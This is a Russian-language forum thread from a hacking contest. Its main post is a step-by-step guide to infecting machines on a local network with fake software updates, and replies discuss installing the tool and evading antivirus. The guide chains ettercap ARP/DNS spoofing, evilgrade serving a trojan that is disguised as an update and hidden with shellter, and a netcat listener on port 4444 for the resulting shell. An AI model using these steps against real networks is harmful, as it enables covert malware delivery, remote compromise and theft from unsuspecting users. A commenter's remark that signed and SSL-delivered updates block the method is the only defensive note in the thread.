1. Набираем команду codeby webinar. Набираем команду для организации и проведения вебинаров. Подробнее ...

    Скрыть объявление
  2. Требуются разработчики и тестеры для проекта codebyOS. Требования для участия в проекте: Знание принципов работы ОС на базе Linux; Знание Bash; Крайне желательное знание CPP, Python, Lua; Навыки системного администрирования. Подробнее ...

    Скрыть объявление
  3. Получи 30.000 рублей. Для получения денег необходимо принять участие в конкурсе авторов codeby. С условиями и призами можно ознакомиться на этой странице ...

    Внимание! Регистрация авторов на конкурс закрыта.

    Скрыть объявление

Конкурс Заражение сети через обновление

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Ondrik8, 5 ноя 2017.

  1. Ondrik8

    Ondrik8 prodigy
    Red Team

    Репутация:
    10
    Регистрация:
    8 ноя 2016
    Сообщения:
    585
    Симпатии:
    1.519
    Статья для участия в конкурсе на codeby​

    Всем привет, решил выдать еще одну статью на конкурс так-как сегодня узнал что в понедельник я уезжаю в ближнее зарубежье решать вопросы по работе(( Планировал я выпустить эту статью после 15 числа сего месяца но видно не судьба..) По этому выпускаю её экстерном и это будет заключительная моя статья для нашего конкурса от меня.
    Речь пойдет о заражении машин в локальной сети через обновление софта пишу ее быстро так-как нужно еще успеть собраться в дорогу за орф. ошибки сильно не пинайте))
    Приступлю как Все Мы знаем что все машины в сети постоянно делают запросы " типо не вышло ли что нить нового для меня!?" Это делают ОС-мы, программы от малого до велика платные и бесплатные все обращаются к своему источнику делая этот запрос "обновится"
    Вот и расскажу я Вам как сделать fake-update так что бы при очередном запросе софта "домой" он (софт) получил ответ "типа: братка обновляйся! тут для тебя обновочка вышла" Софт в свою очередь будет дурить юзеру мозг, " Хозяин тут на меня обновка вышла нажми "ОК" я сам обновлюсь и будем мы жить с тобою в радости и в счастье"
    Помогут нам осуществить эту атаку инструменты : metasploit, ettercap, netcat (котик) и гвоздь нашей программы evilgrade
    Эта утилита просто "бомбезная" мало того что у нее есть свои модули для фэйк обновления так она еще дает возможность создавать свои модули для целевой ОС-и (любой) Linux | Windows что конечно же и радует)) подробно об этом инструменте и как создавать модули, Вы можете узнать здесь.

    • Freerip 3.30
    • Jet photo 4.7.2
    • Teamviewer 5.1.9385
    • ISOpen 4.5.0
    • Istat.
    • Gom 2.1.25.5015
    • Atube catcher 1.0.300
    • Vidbox 7.5
    • Ccleaner 2.30.1130
    • Fcleaner 1.2.9.409
    • Allmynotes 1.26
    • Notepad++ 5.8.2
    • Java 1.6.0_22 winxp/win7
    • aMSN 0.98.3
    • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
    • Mirc 7.14
    • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
    • Dap 9.5.0.3
    • Winscp 4.2.9
    • AutoIt Script 3.3.6.1
    • Clamwin 0.96.0.1
    • AppTapp Installer 3.11 (Iphone/Itunes)
    • getjar (facebook.com)
    • Google Analytics Javascript injection
    • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
    • Winamp 5.581
    • TechTracker (cnet) 1.3.1 (Build 55)
    • Nokiasoftware firmware update 2.4.8es - (Windows software)
    • Nokia firmware v20.2.011
    • BSplayer 2.53.1034
    • Apt ( < Ubuntu 10.04 LTS)
    • Ubertwitter 4.6 (0.971)
    • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
    • Cpan 1.9402
    • VirtualBox (3.2.8 )
    • Express talk
    • Filezilla
    • Flashget
    • Miranda
    • Orbit
    • Photoscape.
    • Panda Antirootkit
    • Skype
    • Sunbelt
    • Superantispyware
    • Trillian <= 5.0.0.26
    • Adium 1.3.10 (Sparkle Framework)
    • VMware
    • more...

    Далее что нам понадобится узнать родной дом программы для фэйк-обновления настроить инструмент ettercap

    как узнать куда програмка стучится за обновкой можно двумя способами перехватить ее данные в wireshark-e или просто плотно изучив ее официальный сайт.

    Узнали? Отлично, идем редачить файл конфигурации ettercap:

    leafpad /etc/ettercap/etter.dns

    Заражение сети через обновление

    и запускаем инструмент : ettercap -G

    Заражение сети через обновление

    Sniff -->Unified Sniffing

    Plugins -->Manage Plugins -->dns_spoof

    Заражение сети через обновление

    Hosts --> scan hosts

    Чтобы увидеть список машин в сети Hosts -> Hosts list

    Заражение сети через обновление

    ( по МАС-ам можете не стараться меня пробить)

    Теперь поместите себя между маршрутизатором (192.168.1.1), выбрав его как Target 1 и жертву (192.168.1.--), выбрав его как Target 2.

    и :

    Заражение сети через обновление

    Заражение сети через обновление
    Отложим пока ettercap, настроим evilgrade до конца.

    Как генерить и прятать троян от антивирусов здесь на Борде перемусолено, по этому останавливаться на этих моментах я не буду, как по мне так лучше, скачайте оригинал версию программы и смешайте её в shellter-e c Вашим трояном.

    "вернемся к нашим баранам" Жванецкий

    evilgrade > configure skype

    Заражение сети через обновление

    evilgrade(skype) > set agent /root/папка_с_трояном/skype_update.exe <<-
    настраиваем фэйк обновку)

    evilgrade (skype) > start

    Запускаем ettercap :

    Заражение сети через обновление

    и просим котика что бы он слушал порт <-тот который слушает Метасплойт или Empire то есть на какой порт настроен наш троян!

    nc -l -p 4444

    и все!)) теперь когда жертва откроет в моем случае skype он (skype) в свою очередь по просит обновится она (терпилка) нажмет "ОК" а мы ....см. ниже))

    Заражение сети через обновление

    как то так.))

    PS: если выиграю конкурс часть средств уйдет в фонд маленьких замерзших котят, а остальное пойдет в фонд алкоголя для "crazy Rassian Hackers"
    а если серьезно то за куплюсь плюшками-радиодеталями и буду Вас радывать новыми статьями)

    Удачи..)

     
    _Eliot_, Sniff, elusive94 и 26 другим нравится это.
  2. IioS

    IioS Well-Known Member
    Red Team

    Репутация:
    6
    Регистрация:
    9 июн 2017
    Сообщения:
    148
    Симпатии:
    240
    Слышала что подобным методом было заражено сеть атомной станции. Этот метод очень сильный! Так как можно заразить все что хочешь, от пк к андроиду.
    Вот мой пример как прятаться от АнтиВирусника
     
    #2 IioS, 5 ноя 2017
    Последнее редактирование: 5 ноя 2017
    woolf1514, Vertigo, ghost и ещё 1-му нравится это.
  3. Ondrik8

    Ondrik8 prodigy
    Red Team

    Репутация:
    10
    Регистрация:
    8 ноя 2016
    Сообщения:
    585
    Симпатии:
    1.519
    да, было такое вот этим)) Staxnet, но там еще пару 0-day участвовало )
     
  4. valerian38

    valerian38 Well-Known Member

    Репутация:
    3
    Регистрация:
    20 июл 2016
    Сообщения:
    349
    Симпатии:
    224
    Ну не атомной станции, а предприятия по обогащению урана. Потом сеть там была локальная, заражение произошло через съёмный носитель.
     
    Vertigo нравится это.
  5. ghost

    ghost penetration testing
    Grey Team

    Репутация:
    9
    Регистрация:
    12 май 2016
    Сообщения:
    627
    Симпатии:
    846
    IioS и Ondrik8 нравится это.
  6. ohno

    ohno New Member

    Репутация:
    0
    Регистрация:
    30 дек 2016
    Сообщения:
    2
    Симпатии:
    0
    Как устанавливается evilgrade? Ни слова на гите не нашёл.
     
  7. AL04E

    AL04E Well-Known Member
    Grey Team

    Репутация:
    10
    Регистрация:
    24 май 2017
    Сообщения:
    117
    Симпатии:
    273
    Способ действительно отличный)
    Нужно как-нибудь обязательно опробовать.
     
  8. Ondrik8

    Ondrik8 prodigy
    Red Team

    Репутация:
    10
    Регистрация:
    8 ноя 2016
    Сообщения:
    585
    Симпатии:
    1.519
    apt install isr-evilgrade
     
    ghost, Cybercop и ohno нравится это.
  9. woolf1514

    woolf1514 Well-Known Member
    Премиум

    Репутация:
    0
    Регистрация:
    6 мар 2017
    Сообщения:
    85
    Симпатии:
    59
    Мое почтение, автор. Это уже даже не технические навыки.. Это тех.скилзы + творчество. Побольше бы таких творцов, любящих делиться информацией!

    Кстати, такая возможность реализована в intercepter-ng 1.0:

    Заражение сети через обновление
     

    Вложения:

    #9 woolf1514, 7 ноя 2017
    Последнее редактирование: 7 ноя 2017
    alekx, Underwood, OneDollar и 2 другим нравится это.
  10. newbiee

    newbiee Active Member
    Премиум

    Репутация:
    2
    Регистрация:
    28 июн 2017
    Сообщения:
    34
    Симпатии:
    45
    так интерцептер же только в LAN работает? или я ошибаюсь?
     
  11. woolf1514

    woolf1514 Well-Known Member
    Премиум

    Репутация:
    0
    Регистрация:
    6 мар 2017
    Сообщения:
    85
    Симпатии:
    59
    В основном, да. Но для некоторых целей можно заставить и в сеть смотреть
     
  12. newbiee

    newbiee Active Member
    Премиум

    Репутация:
    2
    Регистрация:
    28 июн 2017
    Сообщения:
    34
    Симпатии:
    45
     
    ghost нравится это.
  13. woolf1514

    woolf1514 Well-Known Member
    Премиум

    Репутация:
    0
    Регистрация:
    6 мар 2017
    Сообщения:
    85
    Симпатии:
    59
     
    ghost нравится это.
  14. newbiee

    newbiee Active Member
    Премиум

    Репутация:
    2
    Регистрация:
    28 июн 2017
    Сообщения:
    34
    Симпатии:
    45
    НУ блин я же ещё не вступил, короче я пошёл заряжать, пацаны)))
     
    ghost и woolf1514 нравится это.
  15. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    ELEET

    Репутация:
    16
    Регистрация:
    19 окт 2016
    Сообщения:
    657
    Симпатии:
    2.144
    Блин , не хочу выглядит гамнокритиком) но где профит самой сессии? Тема эвилгрейда была популярна еще во времена четвертого бактрака (была эта тулза в репозиториях бактрака)
    именно когда обновления прилетали по http или ftp , без проверки подписи сертификата и без ssl

    Имеет конечно место быть данный вектор , но перед тем как его применить нужно быть уверенным что обновления приходят не по ssl и не проверяются подпись и хеш сумы файлов обновления.

    По этому я же говорю, где сам профит ,конечный результат??
    Последний раз эта утилита у меня работала на обновлении notepad++ в 2013 году. Сейчас не знаю.
    Просьба запрофитить на обновоении винды как к твоей статье.)))
    --- Добавлено 9 ноя 2017. Первое сообщение размещено 9 ноя 2017 ---
    Что бы не быть голословным прошу обратить внимание на дату первого упоминания евилгрейда в гугле:
    Вбиваем evilgrade в гугле
    и видем первое упоминание в 2011 году в журнале хакер,первые видосы в 2013 году.
     
    elusive94, PingVinich, a113 и 3 другим нравится это.
  16. PingVinich

    PingVinich Bug hunter
    ELEET

    Репутация:
    4
    Регистрация:
    19 мар 2017
    Сообщения:
    104
    Симпатии:
    262
    Тоже хотел это написать, но ты меня опередил.
     
Загрузка...

Поделиться этой страницей